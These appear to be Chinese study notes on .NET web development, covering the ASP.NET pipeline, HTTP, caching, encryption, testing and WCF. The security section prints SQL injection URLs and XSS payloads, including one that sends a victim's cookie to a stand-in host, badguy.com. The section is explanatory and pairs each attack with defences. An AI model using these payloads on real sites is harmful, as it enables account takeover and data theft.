* 在这张图中，Web服务器中运行的Web应用程序就是我们所说的Application，每个客户端与Web服务器之间建立的连接就可以看做是一个Session。比如现在服务器端运行的是一个论坛系统，那么现在这个正运行在服务器端的论坛系统的软件就可以看做Application，而每个在线的用户与之建立的连接就相当于一个Session。
* 如果要使用Application要注意的是所有的写操作都要在Application\_OnStart事件中完成（global.Asax），尽管可以使用Application.Lock()避免了冲突，但是它串行化了对Application的请求，会产生严重的性能瓶颈；
* 参考网址：
* <https://blog.csdn.net/lxlj2006/article/details/5608281>
* <https://www.cnblogs.com/Arlar/p/5934651.html>
* Cache
* 在.NET运用中经常用到缓存(Cache)对象。有HttpContext.Current.Cache以及HttpRuntime.Cache，HttpRuntime.Cache是应用程序级别的，而HttpContext.Current.Cache是针对当前WEB上下文定义的。HttpRuntime下的除了WEB中可以使用外，非WEB程序也可以使用
* 在可以的条件，尽量用 HttpRuntime.Cache ，而不是HttpContext.Cache
* 合理的使用缓存

1. 读写小于10:1的情况下，不适合用缓存，我们用缓存的目的就是想分摊下数据库的压力以及利用内存来提速性能，如果读写差不多，或者压根就没读过，这样的死数据就会造成内存资源的浪费。
2. 既然是缓存，就注定了它的资源是有限的，宝贵的，也就注定了我们必须合理利用它的内存空间，也就被迫的让我们清楚的认识到热点数据，不易修改的应该放在缓存，反之不宜放。
3. 大公司在缓存方面做的好的地方就是在一个“控”字上，他们会为缓存专门做一套“缓存系统”，当系统预加载的时候，同时也充当内存数据库使用，将这些元数据加载到缓存系统中，比如“县市区”，“分类信息”等等作为预热数据。

* 局部缓存

## ****软件架构****

* MVC
  + ASP.NET MVC
* MVP
  + 事件模型
    - ASP.NET Web form
      * System.UI.Page
      * ViewState
      * ...
    - Winform
* MVVM
  + 在.Net中(主要应用于WPF、Silverlight、WP7)
    - Prism - Brian Lagunas微软产品经理，微软MVP,一个跨平台的桌面和移动MVVM开发框架，开源。
    - Catel - Catel是一个专注于MVVM（WPF，Silverlight，Windows Phone和WinRT）和MVC（ASP.NET MVC）的应用程序开发平台。 Catel的核心包含一个IoC容器，模型，验证，纪念，消息中介，参数检查等。
    - ...
  + 在前端中
    - Angular
    - Vue
    - Knockout
    - React
    - ...

## ****平台****

* **MONO**
* **.Net Core**
  + CoreCLR
  + CoreRT for .NET Core
  + .NET Core Base Class Library
  + ...
* **.Net Framework**
  + .NET Framework Base Class Library(BCL基类库)
    - System.Web（ASP.NET的核心）
      * ASP.NET与IIS管道模型：

**Http处理流程概述**

请求到服务器端的处理流程：

1. 用户在浏览器中输入的地址，通过DNS解析成“协议+IP+端口“，类似地址，浏览器就将请求发送到这个地址。
2. 有IP确定服务器，请求到达这个地址（服务器）后，再由端口确定进程，由服务器对应的进程处理，在windows server服务器是由一个名为HTTP.SYS服务来接受http请求。
3. HTTP.SYS服务接受到请求后，HTTP.SYS和IIS属于两个进程，属于两个进程之间的通讯，HTTP.SYS通过pipeline（管线）方式转发给IIS。
4. IIS识别不同类型的请求，然后交给不同的应用程序处理，若找不到此类型的处理程序，且请求的文件没有收到服务器保护，则IIS直接把请求的文件返回给客户端。

我们先来了解下第2点中的HTTP.SYS服务到底是个什么东西，它其实是一个服务器内置驱动程序，用来监听来自外部的HTTP请求，在操作系统启动时IIS服务器首先就要在HTTP.SYS中注册自己的虚拟路径，其实是告知HTTP.SYS请求的URL是否可以访问，能访问则交给IIS，不能则返回404错误。

接下来解释下第4点中IIS是依据什么来处理请求的，答案就是请求文件的后缀名，能够处理各种后缀名的应用程序被叫做ISAPI（Internet Server Application Programe Interface，互联网服务器应用程序接口）应用程序，它其实是一个接口，扮演一个代理的角色，映射请求的页面的后缀和与之对应的应用程序。

**ASP.NET管道**

上面是在比较低的层次上讲到的IIS和asp.net框架所完成的工作，那我们写的代码（高层次框架，如WebForm、MVC、WebAPI等）是如何和这部分进行衔接的呢？当Http请求到达asp.net runtime时，交由管道来处理，管道由托管模块（各种HttpModule）和处理程序（各种HttpHandler）组成，控制管道工作的是HttpApplication，下面是管道处理的一个图：



1. HttpRuntime将请求转交给HttpApplication（表示Web应用程序），HttpApplication创建针对Http请求的HttpContext对象，这些对象包含如HttpRequest、HttpResponse等对象， 这些对象在程序中可以通过上下文类进行访问。
2. 接下来Http请求会通过一系列的HttpModule，这些Module对Http请求具有完全控制权，可以做一些执行某个实际工作前的事情。
3. 接来下会被HttpHandler处理，如webForm中的aspx页面继承的page类就是实现了IHttpHandler接口，mvc中则是交给MvcHandler处理。
4. HttpHandler处理完成后，Http请求会再次回到Module，此时Module则可以做一些某个实际工作完成后的事情。

请求在管道中要经过一系列的事件，这些事件由HttpApplication引发，通常由HttpModule订阅，也可以在全局类Global.asax中订阅，这一系列的事件就是一次请求的生命周期。



HttpModule内部事件机制和生命周期：



附上中文详细解释图：



**ASP.NET全局文件GLOBAL.ASAX用法**

Global.asax 文件继承自HttpApplication 类，它维护一个HttpApplication 对象池，并在需要时将对象池中的对象分配给应用程序

**包含的事件**

　　·Application\_Init：在应用程序被实例化或第一次被调用时，该事件被触发。对于所有的HttpApplication 对象实例，它都会被调用。

　　·Application\_Disposed：在应用程序被销毁之前触发。这是清除以前所用资源的理想位置。

　　·Application\_Error：当应用程序中遇到一个未处理的异常时，该事件被触发。

　　·Application\_Start：在HttpApplication 类的第一个实例被创建时，该事件被触发。它允许你创建可以由所有HttpApplication 实例访问的对象。 这是在应用程序中给应用程序级的变量赋值或指定对所有用户必须保持的状态的理想位置。

　　·Application\_End：在HttpApplication 类的最后一个实例被销毁时，该事件被触发。在一个应用程序的生命周期内它只被触发一次。

　　·Application\_BeginRequest：在接收到一个应用程序请求时触发。对于一个请求来说，它是第一个被触发的事件，请求一般是用户输入的一个页面请求（URL）。

　　·Application\_EndRequest：针对应用程序请求的最后一个事件。

　　·Application\_PreRequestHandlerExecute：在 ASP.NET 页面框架开始执行诸如页面或 Web 服务之类的事件处理程序之前，该事件被触发。

　　·Application\_PostRequestHandlerExecute：在 ASP.NET 页面框架结束执行一个事件处理程序时，该事件被触发。

　　·Applcation\_PreSendRequestHeaders：在 ASP.NET 页面框架发送 HTTP 头给请求客户（浏览器）时，该事件被触发。

　　·Application\_PreSendContent：在 ASP.NET 页面框架发送内容给请求客户（浏览器）时，该事件被触发。

　　·Application\_AcquireRequestState：在 ASP.NET 页面框架得到与当前请求相关的当前状态（Session 状态）时，该事件被触发。

　　·Application\_ReleaseRequestState：在 ASP.NET 页面框架执行完所有的事件处理程序时，该事件被触发。这将导致所有的状态模块保存它们当前的状态数据。

　　·Application\_ResolveRequestCache：在 ASP.NET 页面框架完成一个授权请求时，该事件被触发。它允许缓存模块从缓存中为请求提供服务，从而绕过事件处理程序的执行。

　　·Application\_UpdateRequestCache：在 ASP.NET 页面框架完成事件处理程序的执行时，该事件被触发，从而使缓存模块存储响应数据，以供响应后续的请求时使用。

　　·Application\_AuthenticateRequest：在安全模块建立起当前用户的有效的身份时，该事件被触发。在这个时候，用户的凭据将会被验证。

　　·Application\_AuthorizeRequest：当安全模块确认一个用户可以访问资源之后，该事件被触发。

　　·Session\_Start：在一个新用户访问应用程序 Web 站点时，该事件被触发。

　　·Session\_End：在 InProc 模式下运行时，当一个用户的会话超时、结束或他们离开应用程序 Web 站点时，该事件被触发。

* + - * + 集成模式IIS7：

HttpContext

...

* + - * + IIs的常用功能及使用及配置：

请求筛选、失败请求跟踪等

* + - * + .Net MVC生命周期
        + Httphandler、HttpModule、Globar的编写及应用...

MVC URLRouting Module对进入server的request进行了拦截，然后对request的handler进行了处理。asp.net WebForm和asp.net MVC两者的不同，是在于最终使用的IHttpHandle的不同。WebForm中使用的是Page这个Handler，MVC中使用的是MVCHander。

以上资料来自：

[asp.net管道模型学习（一）：Http请求处理流程](http://www.kungge.com/kungge/2484.html)

[深入理解ASP.NET里的HttpModule机制](http://www.cnblogs.com/jeffwongishandsome/archive/2009/07/20/1513527.html)

[ASP.NET管道模型](【ASP.NET】管道模型)

* + - * + ...
    - OWIN解耦
      * Open Web Server Interface for .NET，定义了一种中间件在管道中用于处理请求和相关响应的标准方式，是种规范，用于解耦Web 服务器和Web 应用程序。
      * OWIN的实现：Katana（由微软早期开发的开源OWIN组件集合）
        + OWIN Layer(定义的一系列层)

Application(应用程序)

Middleware(中间件)

Nanacy.Owin

WebApi

Signalr

FubuMVC

Simple.Web

DuoVia.Http

...

Server(服务)

Microsoft.Owin.Host.SystemWeb

Microsoft.Owin.Host.HttpListener

Helios

(Asp.Net5以后就是Microsoft.AspNet命名空间)

...

Host(宿主)

IIS

Custom Host

OwinHost.exe

Node.Js(connect-owin)

...

* + .NET CLR（Commen Language Runtime）公用语言运行时
    - 核心：公共语言基础（Common Language Infrastructure，CLI）,提供了定义的规范接口、与工具
    - 1.项目源代码被 .Net Framework编译器( csc , C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe )编译成EXE或者是DLL文件。
    - 2.被CSC编译后的EXE/DLL文件叫做 IL文件。Intermediate Language （IL）中间语言，在.Net中，称之为 Microsoft IL（MSIL）微软中间语言(右键对项目进行生成的时候实际上就是这一步)
    - 3.CLR会将MSIL通过JIT（Just In Time）编译器进行第二次编译，将其编译成本地平台的CPU指令。(如果拥有能在Linux运行的CLR，代码就能跨平台运行)
    - .
    - C#源码——(CSC编译器)——MSIL文件(dll/exe)——(CLR中的JIT编译器)——CPU执行

## ****Http协议****

OSI协议与TCP/IP协议



TCP/IP协议



* OSI网络通信
  + 物理层
    - 以二进制数据形式在物理媒体上传输数据
  + 数据链路层
    - 传输有地址的帧，错误检测功能
  + 网络层
    - 为数据包选择路由
    - IP，ICMP，RIP...
  + 传输层
    - 提供端对端的接口
    - TCP、UDP...
  + 会话层
    - 建立或解除与其它接点的联系
  + 表示层
    - 数据格式化，代码转换，数据加密
  + 应用层
    - HTTP，FTP，SMTP...
* Http状态码
  + 1xx:信息提示，表示请求已被成功接受，继续处理，请求范围100~101
  + 2xx:成功，服务器成功响应请求，请求范围200~206
  + 3xx:重定向，请求范围300~305
  + 4xx:发送一些服务器无法受理的东西
  + 5xx:一条有效请求，但服务器挂了
* 常用HTTP消息头(Http Header)
  + Request请求头
    - Authorization：Basic base64646464646464=== （验证）
    - Accept-Encoding：gzip （指定浏览器可以支持的web服务器返回内容压缩编码类型）
    - Cache-Control：max-age=60（指定请求和响应遵循的缓存机制，max-age为 当前60秒内再次访问不会去服务器请求）
    - Cookie：ZJF（该请求域名下的所有cookie值一起发送给web服务器）
    - Content-Type：application/x-www-form-urlencoded（是以什么格式来传输，请求的与实体对应的MIME信息）
    - Accept：text/plain（指定客户端能够接收的内容类型）
    - Range：bytes=0-999（常用作断点续传，设置请求的指定范围，服务器则返回Content-Range: bytes 0-999）
    - Referer： （当前请求来源的网页地址）
    - Origin： （和Referer差不多，只存在于POST请求）
    - Host:： （指定请求的服务器的域名和端口号）
    - User-Agent:：Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36（当前客户端的信息）
    - Expect：100-continue（握手失败，请求头域类型不匹配，由此导致的API接口调用失败）
  + Response返回头
    - Connection: keep-alive（连接方式，很重要）
    - Access-Control-Allow-Origin: \*（跨域，很重要）
    - Set-Cookie: UserID=admin; Max-Age=3600; Version=1
    - Content-Encoding:gzip

**表单提交与成功控件**

浏览器并不是将所有的表单控件全部发送到服务器的，而是会查找所有的【**成功控件**】，只将这些成功控件的数据发送到服务端， 什么是成功控件呢？  
简单地来说，成功控件就是：每个表单中的控件都应该有一个name属性和”当前值“， 在提交时，它们将以 name=value 的形式做为提交数据的一部分。

对于一些特殊情况，成功控件还有以下规定：  
1. 控件不能是【禁用】状态，即指定【disabled="disabled"】。即：禁用的控件将不是成功控件。  
2. 如果一个表单包含了多个提交按键，那么仅当用户点击的那个提交按钮才算是成功控件。  
3. 对于checkbox控件来说，只有被用户勾选的才算是成功控件。  
4. 对于radio button来说，只有被用户勾选的才算是成功控件。  
5. 对于select控件来说，所有被选择的选项都做为成功控件，name由select控件提供。  
6. 对于file上传文件控件来说，如果它包含了选择的文件，那么它将是一个成功控件。  
此外，浏览器不会考虑Reset按钮以及OBJECT元素。

控件输入的内容并不是直接发送的， 而是经过一种编码规则来处理的。目前基本上只会只使用二种编码规则：application/x-www-form-urlencoded 和 multipart/form-data ， 这二个规则的使用场景简单地说就是：后者在上传文件时使用，其它情形则使用前者(默认)。

这个规则是在哪里指定的呢？ 其实form还有个enctype属性，用它就可以指定编码规则

浏览器处理表单数据的过程大致分为4个阶段：  
1. 识别所有的成功控件。  
2. 为所有的成功控件创建一个数据集合，它们包含 control-name/current-value 这样的值对。  
3. 按照form.enctype指定的编码规则对前面准备好的数据进行编码。编码规则将放在请求中，用【Content-Type】指出。  
4. 提交编码后的数据。此时会区分post,get二种情况，提交的地址由form.action属性指定的。

* 实时通信方案
  + .Net Signalr+
  + Ajax轮询
  + Comet
  + WebSocket(SuperWebSocket，WebSocket服务器)
  + SSE（Server-sent Events服务器发送事件）
  + ...

## ****域名解析****

* DNS解析流程
* 常见 域名解析记录
  + A记录：用来指定域名或子域名对应的IP地址记录，保证域名指向对应的主机
  + CNAME记录：别名记录，该记录允许你为自己的主机设置别名
  + MX记录：邮件路由记录，当发送邮件时，Mail 服务器先对域名进行解析，查找mx记录
  + TXT记录：是域名系统(DNS)中由域名托管服务商存储的一种资源记录，其作用是防止垃圾邮件滥用行为
  + AAAA记录：指定网站域名对应的IPv6地址记录
  + NS记录：Name Server，用于指定域名是由那个DNS服务器来进行域名解析
  + ...

## ****网站优化****

* JavaScript和Css模块化
* CSS Sprites：将一个页面涉及到的所有零星图片都包含到一张大图中去，这样一来，将N次请求变成一次请求
* 划分资源域
* 合理运用缓存技术
  + 静态文件（图片、css、js、html ）缓存： cdn技术、squid缓存服务器、浏览器(客户端)缓存
  + HTML5 application cahce API离线缓存
  + 应用层缓存：Cache、Redis缓存数据库、memcache缓存数据库
  + 数据库缓存：数据库本身的缓存机制
  + ...
* 了解浏览器工作机制：Css放顶部，Js放底部，压缩Html，能配置Expires/Cathe-Control，ETag，使用 gzip 压缩
* 用ISP(互联网服务提供商)提供的文件存储等技术
* 提高DNS域名解析速度
* 掌握SEO
  + 确保网站是可以被索引的： robots.txt，Robtots 标签
  + 确保网页是可以被索引的：确保爬虫可以看到所有的内容、使用描述性的锚文本的网页
  + 擅长标签编写：带有 H1 标签、关键词放 URL 中、加粗文字、Descripiton 标签、图片文件名、ALT 属性带有关键词
  + ...
* 删除不必要的HTTP响应头
  + 移除X-AspNet-Version HTTP头
  + 移除X-AspNetMvc-Version HTTP头
  + 移除X-Powered-By HTTP头
  + 移除Server HTTP头
  + ...
* 用户数据分析
  + PV IP UV
  + 访问流量来源
    - 浏览器
    - 移动设备
    - ...
* ...

## ****默认隐藏段（拒绝客户端访问）****

* App\_Browsers：包含浏览器定义(.browser文件),ASP.NET会使用这些文件来识别个别浏览器并判断它们的功能
* App\_Code：包含用于公用程序和商务对象(Business Object) , (例如, .cs ; .vb和.jsl文件)的程序源代码,要将它编译为应用程序的一部分
* App\_Data：包含应用程序数据文件.包括MDF文件,XML文件与其他数据库文件
* App\_GlobalResources：包含资源(.resx和.resources文件),这些资源会编译成具有全局范围的组件
* App\_LocalResources：包含资源(.resx和.resources文件),这些资源会与特定的页面,拥护控件或应用程序的主页面(MasterPage)相关联
* App\_WebReferences：包含参考合约文件(.wsdl文件),结构描述(.xsd文件)和探索文件(.disco和.discomap文件),可定义Web应用以用语应用程序
* Bin：包含空间,组件或你要在应用程序中应用其他程序代码的已编译组件(.dll文件).在[Bin]文件夹中以程序代码表示的任何类, 都会自动在应用程序中应用到
* Web.config：用来储存Asp.net Web应用程序的配置信息，通过继承关系，每个Web.config将配置设置应用到它所在的目录及虚拟子目录下
* ...

## ****特殊目录****

* Bin：是二进制binary的英文缩写,用来存放编译的结果
  + Debug 调试版本 开发环境 有调试信息
  + Release 发行版本 代码更小,执行更快,编译更严格,更慢 没有调试信息
* Obj：是object的缩写，用于存放编译过程中生成的中间临时文件,用来加快编译速度
  + Debug
  + Release

## ****需要掌握的前端知识****

* Html5+Css3
* JQuery插件语法
* Js实现封装-继承-多态
* 实现一个简单的MVVM框架
* 实现一个简单的js模板引擎
* Angular
  + 路由、模块化、控制器、指令、作用域、模板、链式函数、过滤器、服务、依赖注入...
* React
  + 虚拟DOM，组件化...
* ...

## ****信息加密技术：****

* 单向散列加密（杂凑函数、Hash函数）
  + 把任意长的输入消息串变化成固定长的输出串且由输出串难以得到输入串的一种函数，用于产生消息摘要，密钥加密
  + MD5，SHA，MAC，CRC...
* 对称加密
  + 使用的密钥(yue)只有一个，发收信双方都使用这个密钥对数据进行加密和解密
  + DES，3DES，AES，TDEA，Blowfish，RC5，IDEA...
* 非对称加密（公私钥加密）
  + 指加密和解密使用不同密钥的加密算法，分公钥和私钥
  + RSA，Elgamal，背包算法，Rabin，D-H，ECC...

## ****SSL****

* Secure Socket Layer，安全套接字层,保护Web通讯,以实现客户端和服务器之间的安全通讯
* HTTPS：是在HTTP上建立SSL加密层，并对传输数据进行加密，是HTTP协议的安全版
  + Let's Encrypt,国外一个公共的免费SSL
  + StartSSL,被各大浏览器所支持,但只免费一年
  + ...

## ****TLS****

* Transport Layer Security，安全传输层协议，用于在两个通信应用程序之间提供保密性和数据完整性，建立在SSL 3.0协议规范之上，是SSL 3.0的后续版本

## ****Web安全****

* 渗透注入
  + Sql注入、命令表达式注入、SSRF注入、XSS注入、CSRF注入、XXE注入...

**SQL注入**

所谓SQL注入，就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。

假设我们在浏览器中输入http://localhost:3452/ExcelUsingXSLT/Default.aspx，由于它只是对页面的简单请求无需对数据库动进行动态请求，所以它不存在SQL Injection，当我们输入http://localhost:3452/ExcelUsingXSLT/Default.aspx?jobid=1时，我们在URL中传递变量testid，并且提供值为23，由于它是对数据库进行动态查询的请求（其中?testid＝23表示数据库查询变量），所以我们可以该URL中嵌入恶意SQL语句。

现在我们要通过页面请求的方式，让数据库执行我们的SQL语句，我们要在URL中嵌入恶意表达式1=1（或2=2等等），如下URL所示：http://localhost:3452/ExcelUsingXSLT/Default.aspx?jobid=1'or'1'='1

****

现在我们把job表中的所有数据都查询出来了，仅仅通过一个简单的恒真表达式就可以进行了一次简单的攻击。

虽然我们把数据都查出来了，但数据并没有太大的价值，接着我们再确定下数据库的表名。

首先我们假设表名就是job，然后输入以下URL：

<http://localhost:3452/ExcelUsingXSLT/Default.aspx?jobid=1'or> 1=(select count(\*) from job)--



当我们输入了以上URL后，结果服务器返回我们错误信息，这证明了我们的假设是错误的，那我们该感觉到挫败吗？不，其实这里返回了很多信息，首先它证明了该表名不是job，而且它还告诉我们后台数据库是SQL Server，不是MySQL或Oracle，这也设计一个漏洞把错误信息直接返回给了用户。

接下假定表名是jobs，然后输入以下URL：

[http://localhost:3452/ExcelUsingXSLT/Default.aspx?jobid=1'or1=(select count(\*) from jobs) --](http://localhost:3452/ExcelUsingXSLT/Default.aspx?jobid=1'or1=(select%20count(*)%20from%20jobs)%20--)



现在证明了该表名是jobs，这可以迈向成功的一大步，由于我们知道了表名就可以对该表进行增删改操作了，而且我们还可以猜测出更多的表对它们作出修改，一旦修改成功那么这将是一场灾难。

现在大家已经对SQL Injection的攻击有了初步的了解了，接下让我们学习如何防止SQL Injection。

总的来说有以下几点：

1. 永远不要信任用户的输入，要对用户的输入进行校验，可以通过正则表达式，或限制长度，对单引号和双"-"进行转换等。

2. 永远不要使用动态拼装SQL，可以使用参数化的SQL或者直接使用存储过程进行数据查询存取。

3. 永远不要使用管理员权限的数据库连接，为每个应用使用单独的权限有限的数据库连接。

参考资料：[利用SQL注入漏洞登录后台](https://www.cnblogs.com/sdya/p/4568548.html)

**XSS注入**

XSS 全称(Cross Site Scripting) 跨站脚本攻击， 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时，脚本就会在用户的浏览器上执行，从而达到攻击者的目的.  比如获取用户的Cookie，导航到恶意网站,携带木马等。

假如有下面一个textbox

<input type="text" name="address1" value="value1from">

value1from是来自用户的输入，如果用户不是输入value1from,而是输入

"/><script>alert(document.cookie)</script><!- 那么就会变成

<input type="text" name="address1" value=""/><script>alert(document.cookie)</script><!- ">

嵌入的JavaScript代码将会被执行

或者用户输入的是  "onfocus="alert(document.cookie)那么就会变成

<input type="text" name="address1" value="" onfocus="alert(document.cookie)">

XSS之所以会发生， 是因为用户输入的数据变成了代码。 所以我们需要对用户输入的数据进行HTML Encode处理。 将其中的"中括号"， “单引号”，“引号” 之类的特殊字符进行编码。

在C#中已经提供了现成的方法，只要调用HttpUtility.HtmlEncode("string <scritp>") 就可以了。

**XSS攻击场景**

1. Dom-Based XSS 漏洞

攻击过程如下：

Tom 发现了Victim.com中的一个页面有XSS漏洞，

例如: http://victim.com/search.asp?term=apple

Tom 先建立一个网站http://badguy.com,  用来接收“偷”来的信息。  
然后Tom 构造一个恶意的url(如下), 通过某种方式(邮件，QQ)发给Monica

http://victim.com/search.asp?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>

Monica点击了这个URL，嵌入在URL中的恶意Javascript代码就会在Monica的浏览器中执行. 那么Monica在victim.com网站的cookie, 就会被发送到badguy网站中。这样Monica在victim.com 的信息就被Tom盗了.

Ps:上面URL的意思是打开victim.com页面，并将该网站的Cookie作为参数传给badguy.com网站。

2.Stored XSS(存储式XSS漏洞)

该类型是应用广泛而且有可能影响大Web服务器自身安全的漏洞，攻击者将攻击脚本上传到Web服务器上，使得所有访问该页面的用户都面临信息泄露的可能。

攻击过程如下：  
Alex发现了网站A上有一个XSS 漏洞，该漏洞允许将攻击代码保存在数据库中，

Alex发布了一篇文章，文章中嵌入了恶意JavaScript代码。

其他人如Monica访问这片文章的时候，嵌入在文章中的恶意Javascript代码就会在Monica的浏览器中执行，其会话cookie或者其他信息将被Alex盗走。

Dom-Based XSS漏洞威胁用户个体，而存储式XSS漏洞所威胁的对象将是大量的用户.

**XSS漏洞修复**

1. 将重要的Cookie标记为HttpOnly,这样的话Javascript 中的document.cookie语句就不能获取到Cookie了.（HttpOnly一旦被设置，在浏览器的document对象中就看不到Cookie了。而浏览器在浏览网页的时候不受任何影响，因为Cookie会被放在浏览器头中发送出去）

2. 只允许用户输入我们期望的数据。例如：年龄的textbox中，只允许用户输入数字。而数字之外的字符都过滤掉。

3. 对数据进行Html Encode处理

4. 过滤或移除特殊的Html标签， 例如: <script>, <iframe> , &lt; for <, &gt; for >, &quot for

5. 过滤JavaScript事件的标签。例如"onclick=", "onfocus"等等。

ASP.NET中有防范XSS的机制，对提交的表单会自动检查是否存在XSS，当用户试图输入XSS代码的时候，ASP.NET会抛出一个错误。

参考资料：[web安全之XSS注入](http://www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.html)

[使用HttpOnly提升Cookie安全性](https://blog.csdn.net/zzzmmmkkk/article/details/10862949)

**CSRF注入**

CSRF（Cross-site request forgery），中文名称：跨站请求伪造，也被称为：one click attack/session riding

你这可以这么理解CSRF攻击：攻击者盗用了你的身份，以你的名义发送恶意请求。CSRF能够做的事情包括：以你名义发送邮件，发消息，盗取你的账号，甚至于购买商品，虚拟货币转账......造成的问题包括：个人隐私泄露以及财产安全。



CSRF攻击是源于WEB的隐式身份验证机制！WEB的身份验证机制虽然可以保证一个请求是来自于某个用户的浏览器，但却无法保证该请求是用户批准发送的！

**CSRF的防御**

服务端的CSRF方式方法很多样，但总的思想都是一致的，就是在客户端页面增加伪随机数。

1. 首先在后台设置一个Cookie的随机数

2. 在表单中添加一个控件，存放该随机数

3. 在表单提交的后台验证该随机数

渗透注入检测工具

* + DirBuster目录渗透工具，专门用于探测Web服务器的目录和隐藏文件
  + Nmap网络连接端软件，网络连接端扫描软件，用来扫描网上电脑开放的网络连接端
  + Pangolin Sql注入工具
  + AppScan业界领先的web应用安全监测工具（软件界面可以选择中文，不过是收费的）
  + ...
* 欺骗
  + ClickJacking（点击劫持）
    - 透明iframe
      * HTTP头——X-Frame-Options
    - 图片掩盖接口
* 暴力破解
* DDOS
* 文件安全
  + 配置文件、备份文件暴露读取、未授权修改、未授权上传
* 逻辑安全
  + 未授权访问、上下流程顺序可乱序、无限递归
* 二进制安全
  + （VS中有性能分析工具）
  + 堆栈溢出(很多人都碰过)、缓存区溢出、内存泄漏

## ****Web认证****

* 第三方认证
  + Oauth2.0
  + Json Web Token
  + SSO单点登录
    - 同源策略
    - CAS解决方案
* IIs/.Net认证
  + Basic
  + Digest Authentication
  + Windows
  + Forms

## ****解决方案****

* 代码管理
  + Git：免费、开源的分布式版本控制系统，用的人最多
  + Svn：集中式的版本控制系统，一个强大的备份服务器
  + TFS：微软源代码管理工具
* 自动化测试
  + UI测试
    - VS自带的UI测试工具
    - MS Test 如何测试异步方法呢？

我们只需为异步方法添加async和Task，然后在await一下异步方法即可。

* [Test]
* public async Task SynchronizeTestWithCodeViaAwait()
* {
* var sut = new SystemUnderTest();
* // Schedule operation to run asynchronously and wait until it is finished.
* await sut.StartAsync();
* // Assert outcome of the operation.
* Assert.AreEqual("Init Work", sut.Message);
* }
  + 单元测试(Unit Testing)
    - Tdd测试驱动开发（Test-Driven Development）
      * VS自带的单元测试工具，Xunit，Nunit，Moq，Faker.Net
  + 性能分析
    - VS自带的性能分析工具，MiniProfiler
  + 压力测试
    - 概念
      * 吞吐率(Throughput)
      * QPS每秒查询率(Query Per Second)
      * TPS每秒事务数(Transaction Per Second)，并发用户数
      * ...
    - VS自带的压力测试工具，HttpTest4Net，Jmeter...
* 安全检测
* 自动化部署
  + VS的Web Deploy，Jenkins...
* 监控平台
* 自动化故障调控
* 命名规范
* **命名规范**
* 1.匈牙利命名：
* 开头字母用变量类型的缩写，其余部分用变量的英文或英文的缩写，要求单词的第一个字母大写。
* Ex：
* Int iAge = 10; //i是int的缩写
* Float fPrice = 5999.9; //f是float的缩写
* 其他：   
  前缀类型 a b by c cb cr cx,cy dw fn h i l lp m\_ n np p s sz w （一一对应关系）
* 数组 (Array) 布尔值 (Boolean) 字节 (Byte) 有符号字符 (Char) 无符号字符 (Char Byte，没有多少人用) 颜色参考值 (ColorRef) 坐标差（长度 ShortInt） Double Word 函数 Handle（句柄） 整型 长整型 (Long Int) Long Pointer 类的成员 短整型 (Short Int) Near Pointer Pointer 字符串型 以 null 做结尾的字符串型 (String with Zero End) Word
* 2.驼峰式命名：
* 又叫小驼峰式命名法。   
   第一个单词首字母小写，后面其他单词首字母大写。
* Ex：
* Int age = 10;
* String myName = “LiLy”;
* 3.帕斯卡([Pascal](https://baike.baidu.com/item/Pascal%E8%AF%AD%E8%A8%80))命名
* 又叫大驼峰命名法。
* 每个单词的首字母都大写。
* Ex：
* Int Age = 10;
* String MyName = “Lily”;
* 4 . 还有些许其他的命名规范，如：下划线命名法。

## ****分布式****

* 负载均衡
  + 什么时候才会负载均衡（什么是负载均衡）
  + 负载均衡的几种实现
    - OSI层面，在网络7层协议基础上实现的负载均衡
    - 软件层面
  + 负载均衡算法
    - 权重轮循均衡
    - 权重随机均衡
    - 响应速度均衡
    - 最少连接数均衡
    - 处理能力均衡
    - DNS响应均衡
  + 集群
    - 负载均衡服务器
    - 应用服务服务器
    - 文件系统服务器
    - 数据库服务器
    - 缓存服务器
    - ...
  + 分离模式
    - 前后端分离
    - 动静分离
    - 数据库读写分离
    - 服务分离
    - 业务分离
    - ...
* 故障可弹性
* 服务一致性
* 中心化配置

## ****WCF****

* 服务是端点的集合。每个端点都有自己的地址，绑定，契约。契约揭示了端点的功能，地址就是这些功能在网络上所在的位置，而绑定则指明了如何访问这些功能。
* 端点和契约之间是多对一的关系，如果使用了相同的绑定，则可以位于同一个地址。
* 服务中可以通过多个端点发布同一个契约，则可以通过多个绑定对其进行访问。
* 例如：我们可以发布一个basicHttpBinding以获得广泛的互通；也可以通过使用netTcpBinding发布这个契约，已获得更高的性能。
* 上述名字在配置文件中对应的节点名词：
* 服务 => Service
* 端点 => EndPoint
* 地址 => Address
* 绑定 => Binding 管道
* 契约 => Contract 接口
* **契约**
* 1.服务契约
* 服务契约定义了服务的操作，即服务类所发布的接口方法。服务契约为服务提供正式的 WSDL接口。通过[ServiceContract]与[OperationContract]属性，就可以定义服务契约。默认的操作名称是从类和方法名得来的，不过也可以在定义这些属性的时候指定。服务契约支持3 种消息交换模式：请求一响应模式、单向模式和双工模式。

请求一响应模式的操作契约会令客户端的调用阻塞，也就是客户端等待服务操作结束，

* **请求一响应模式**的操作契约会令客户端的调用阻塞，也就是客户端等待服务操作结束，然后才重新得到执行控制权。因此，这种模式的契约只应该用于服务调用相对快速且用户愿意等待相应结果的情况下。使用请求一响应消息交换模式时，如果服务请求的执行时间很长，客户端可以使用.NET异步模式来避免阻塞等待。
* **单向操作契约**名符其实，是单向的，这种服务不会向客户端返回结果。服务操作的返回值类型必须为void，而且要在[OperationContract]属性上做[IsOneWay=true]的标记。单向契约可以在任何传输方式上实现，包括MSMQ
* **双工操作契约**，对客户端与服务之间的请求与相应的执行进行了解耦，从而具有最大的自由度与最高的性能。客户端与服务之间的双工信道建立完毕后，无论是客户端还是服务都可以发起消息传递\*这种模式非常适于用来对客户端作通知功能。
* 2.数据契约
* 数据契约定义了服务的应用层数据接口。凡是标有[DataComract]和[DataMember]属性的类，均会被包含在代表服务契约的WSDL中的XML模式定义（XSD)部分。其他数据类型也可以通过WSDL对外发布，如基本类型及标有[Serializable]的类型，由于[DataContract]对于序列化的规则是针对互通性设计的，WCF将其作为首选的序列化机制
